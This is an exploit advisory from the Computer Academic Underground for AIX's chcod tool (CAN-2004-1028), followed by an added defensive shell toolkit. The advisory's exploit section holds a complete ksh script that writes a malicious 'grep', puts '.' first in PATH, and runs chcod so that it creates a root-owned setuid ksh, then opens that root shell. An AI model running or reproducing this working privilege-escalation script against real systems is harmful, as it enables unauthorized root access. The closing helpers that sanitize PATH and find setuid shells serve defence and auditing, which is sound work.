                      ____            ____          __      __
                     /    \          /    \        |  |    |  |
   ----====####/    /\__\##/    /\    \##|  |##|  |####====----
                   |    |        |  |__|  |      |  |    |  |
                   |    |  ___   |   __   |      |  |    |  |
   ------======######\    \/    /#|  |##|  |#|  |##|  |######======------
                      \____/      |__|  |__|      \______/

                    Computer Academic Underground
                       http://www.caughq.org
                           Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2004-0005
Release Date:   2004.12.23
Title:          chcod-suidshell.sh
Description:    chcod Trusted $PATH SUID Shell Creation
Tested:         chcod on AIX 5.1.0
Attributes:     Privileged Access Exploit
URL:            http://www.caughq.org/exploits/CAU-EX-2004-0005.txt
Author/Email:   I)ruid
===============/========================================================

Description
===========

This script exploit writes out a simple shell script named 'grep' which
copies ksh, sets its ownership to root, and sets the suid bit on it, thus
creating a suid shell. The exploit then runs 'chcod', which, because it
does not drop its privileges, executes our malicious 'grep' found via the
modified $PATH environment variable. Afterward it cleans up its mess and
executes the suid shell for convenience.

Notes
=====

This exploit is written assuming your target shell is ksh.

Credits
=======

iDEFENSE Labs is credited with this discovery.

References
==========

http://www.idefense.com/application/poi/display?id=170&type=vulnerabilities
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1028

Exploit
=======

#!/usr/bin/ksh
#
# chcod-suidshell.sh - I)ruid [CAU] (12.2004)
#
# Exploits AIX's chcod tool which does not drop privs prior to
# executing 'grep' via trusted $PATH environment variable.
#

echo "Creating malicious 'grep'"
cat > ./grep << __EOF__
#!/usr/bin/ksh
cp /usr/bin/ksh ./ksh
chown root:system ./ksh
chmod 6755 ./ksh
__EOF__
chmod 700 ./grep

echo "Setting up malicious PATH environment"
export PATHSAVE=$PATH
export PATH=.:$PATH

echo "Executing /usr/sbin/chcod"
/usr/sbin/chcod

echo "Cleaning up our mess..."
rm ./grep
export PATH=$PATHSAVE
export PATHSAVE=

echo "Executing suid shell:"
./ksh
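Added example, not part of the CAU advisory and not AIX or iDEFENSE code (the function names are ours): a small POSIX sh toolkit for the defender's side of the same trusted-$PATH problem. sanitize_path drops every empty or relative PATH entry (the '.' the exploit prepends resolves 'grep' to the attacker's script), path_is_safe lets a privileged script refuse to run with such a PATH instead of trusting whatever the caller exported, and find_suid_shells walks a tree for setuid files named like a shell, the artifact this class of exploit leaves behind.

```shell
#!/bin/sh
# Defensive helpers for the trusted-PATH weakness described above.
# Added example; the function names below are our own, not AIX commands.

# sanitize_path PATHSTRING
# Print PATHSTRING with every unsafe entry removed. Empty entries
# (a leading, trailing or doubled ':') mean "current directory", as do
# '.' and '..'; any other relative entry is just as bad. Only absolute
# directories survive. Absolute but world-writable directories such as
# /tmp are a separate problem this helper does not address.
sanitize_path() {
    _sp_in=$1
    _sp_out=""
    _sp_oldifs=$IFS
    IFS=:
    set -f                        # no globbing while the entries are split
    for _sp_entry in $_sp_in; do
        case $_sp_entry in
            /*) _sp_out="${_sp_out:+$_sp_out:}$_sp_entry" ;;
            *)  ;;                # empty, '.', '..' or other relative entry: drop
        esac
    done
    set +f
    IFS=$_sp_oldifs
    printf '%s\n' "$_sp_out"
}

# path_is_safe PATHSTRING
# Exit status 0 only if PATHSTRING contains nothing sanitize_path would
# remove. A privileged script can call this before running any command
# it names without an absolute path.
path_is_safe() {
    [ "$(sanitize_path "$1")" = "$1" ]
}

# find_suid_files DIR
# List every regular file under DIR (same filesystem) with the setuid bit.
find_suid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# find_suid_shells DIR
# Restrict the setuid list to files whose basename is a common shell.
# A setuid 'ksh' in a home or temp directory is exactly what the exploit
# above produces; the legitimate copies live under /usr/bin and /bin and
# are normally not setuid at all.
find_suid_shells() {
    find_suid_files "$1" | while IFS= read -r _fs_file; do
        case ${_fs_file##*/} in
            sh|ksh|ksh93|bash|csh|tcsh|zsh) printf '%s\n' "$_fs_file" ;;
        esac
    done
}

# When run directly: report on the caller's own PATH.
if path_is_safe "$PATH"; then
    echo "PATH is safe: $PATH"
else
    echo "PATH has unsafe entries; sanitized value: $(sanitize_path "$PATH")"
fi
```

A privileged wrapper should not merely sanitize the inherited PATH but replace it outright (PATH=/usr/bin:/bin:/usr/sbin:/sbin) and call helper programs by absolute path; sanitize_path is for the case where the caller's entries must be preserved. The shell-name filter in find_suid_shells is a heuristic for a quick sweep; a hash comparison of every setuid file against the package database catches a renamed copy.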